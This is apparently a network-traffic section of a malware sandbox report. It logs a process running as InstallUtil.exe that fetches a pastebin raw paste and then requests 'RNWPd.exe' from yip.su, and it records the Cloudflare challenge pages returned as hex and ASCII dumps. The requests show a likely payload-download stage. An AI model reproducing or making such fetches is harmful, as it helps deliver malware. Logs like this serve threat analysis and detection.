2024-08-11 09:22:43 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:22:43 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:22:43 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
2024-08-11 09:22:43 UTC	1369	IN	Data Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72 Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
2024-08-11 09:22:43 UTC	1369	IN	Data Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
2024-08-11 09:22:43 UTC	1369	IN	Data Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69 Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
2024-08-11 09:22:43 UTC	1369	IN	Data Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 34 36 36 38 34 27 2c 63 52 61 79 3a 20 27 38 62 31 37 32 39 61 64 61 64 32 65 38 63 34 32 27 2c 63 48 61 73 68 3a 20 27 36 62 39 39 32 65 65 31 66 32 32 36 34 33 33 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 6f 45 58 76 4e 6c 49 45 54 42 6a 6c 6d 52 64 63 64 47 57 31 58 6f 77 4f 41 54 66 74 79 73 44 73 2e 6c 41 7a 50 52 63 63 68 63 49 2d 31 37 32 33 33 36 38 31 36 33 2d 30 2e 30 2e 31 2e 31 2d 33 36 32 35 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '46684',cRay: '8b1729adad2e8c42',cHash: '6b992ee1f226433',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=oEXvNlIETBjlmRdcdGW1XowOATftysDs.lAzPRcchcI-1723368163-0.0.1.1-3625",cFPWv: 'g',cTTim
2024-08-11 09:22:43 UTC	1369	IN	Data Raw: 33 36 34 2e 4e 6e 72 45 68 63 72 43 6d 59 2e 57 41 63 52 43 5a 31 4b 4c 50 6d 78 73 38 47 6b 64 6c 58 53 42 34 78 46 71 78 52 70 50 74 6c 49 6b 52 43 2e 4d 53 70 6c 52 6a 62 72 7a 76 35 78 42 59 71 76 74 31 79 4c 72 78 79 59 4b 4d 33 38 33 4d 54 5a 7a 5f 62 49 7a 54 76 30 65 74 44 42 74 50 41 36 58 77 6f 6c 6c 4b 50 39 72 58 38 59 5f 34 47 61 67 73 43 32 56 37 52 6d 37 41 53 53 32 74 4a 44 75 45 6b 69 66 49 6d 4d 58 6f 54 66 58 33 44 6a 2e 71 75 6b 78 38 69 2e 48 65 63 6f 6e 79 32 77 4e 59 4f 54 4b 4c 66 53 34 4b 62 79 59 64 70 31 62 39 32 4e 78 4f 53 6e 62 6c 42 44 6f 61 6f 78 6d 35 41 56 64 45 6d 6b 51 54 48 42 5f 36 70 65 53 31 68 50 66 70 5f 4a 6b 67 53 33 5a 6b 59 66 79 36 75 38 45 6c 51 47 53 6c 70 62 35 48 58 63 69 33 31 2e 58 75 4e 55 4e 32 77 36 Data Ascii: 364.NnrEhcrCmY.WAcRCZ1KLPmxs8GkdlXSB4xFqxRpPtlIkRC.MSplRjbrzv5xBYqvt1yLrxyYKM383MTZz_bIzTv0etDBtPA6XwollKP9rX8Y_4GagsC2V7Rm7ASS2tJDuEkifImMXoTfX3Dj.qukx8i.Hecony2wNYOTKLfS4KbyYdp1b92NxOSnblBDoaoxm5AVdEmkQTHB_6peS1hPfp_JkgS3ZkYfy6u8ElQGSlpb5HXci31.XuNUN2w6

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49733	172.67.19.24	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:48 UTC	74	OUT	GET /raw/V6VJsrV3 HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-08-11 09:22:48 UTC	222	IN	HTTP/1.1 200 OK Date: Sun, 11 Aug 2024 09:22:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Server: cloudflare CF-RAY: 8b1729cd882e0f70-EWR
2024-08-11 09:22:48 UTC	1147	IN	Data Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-11 09:22:48 UTC	1369	IN	Data Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72 Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
2024-08-11 09:22:48 UTC	1369	IN	Data Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
2024-08-11 09:22:48 UTC	529	IN	Data Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76 Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
2024-08-11 09:22:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49734	188.114.97.3	443	7628	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-11 09:22:49 UTC	65	OUT	GET /RNWPd.exe HTTP/1.1 Host: yip.su Connection: Keep-Alive
2024-08-11 09:22:49 UTC	1285	IN	HTTP/1.1 403 Forbidden Date: Sun, 11 Aug 2024 09:22:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Opener-Policy: same-origin Cross-Origin-Resource-Policy: same-origin Origin-Agent-Cluster: ?1 Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=() Referrer-Policy: same-origin X-Content-Options: nosniff X-Frame-Options: SAMEORIGIN cf-mitigated: challenge
2024-08-11 09:22:49 UTC	685	IN	Data Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 6e 66 31 78 7a 57 68 79 48 5a 4c 6f 63 74 78 4a 34 75 71 6b 72 46 4e 34 4d 65 75 46 6a 79 53 38 79 4b 52 48 41 5a 33 68 4b 54 6c 73 4a 62 39 39 66 4b 72 34 54 7a 39 69 4c 38 65 6b 44 4a 42 70 59 6e 70 50 49 58 32 72 66 31 44 6b 64 6f 4b 4d 61 66 32 47 45 4d 57 79 78 30 78 35 70 69 68 48 5a 64 32 37 41 73 55 4e 79 4d 30 3d 24 6f 70 2b 4e 59 64 69 78 44 74 66 71 78 34 55 35 46 47 71 49 4b 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20 Data Ascii: cf-chl-out: nf1xzWhyHZLoctxJ4uqkrFN4MeuFjyS8yKRHAZ3hKTlsJb99fKr4Tz9iL8ekDJBpYnpPIX2rf1DkdoKMaf2GEMWyx0x5pihHZd27AsUNyM0=$op+NYdixDtfqx4U5FGqIKQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
2024-08-11 09:22:49 UTC	1369	IN	Data Raw: 33 63 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d Data Ascii: 3c10<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
2024-08-11 09:22:49 UTC	1369	IN	Data Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
2024-08-11 09:22:49 UTC	1369	IN	Data Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
2024-08-11 09:22:49 UTC	1369	IN	Data Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
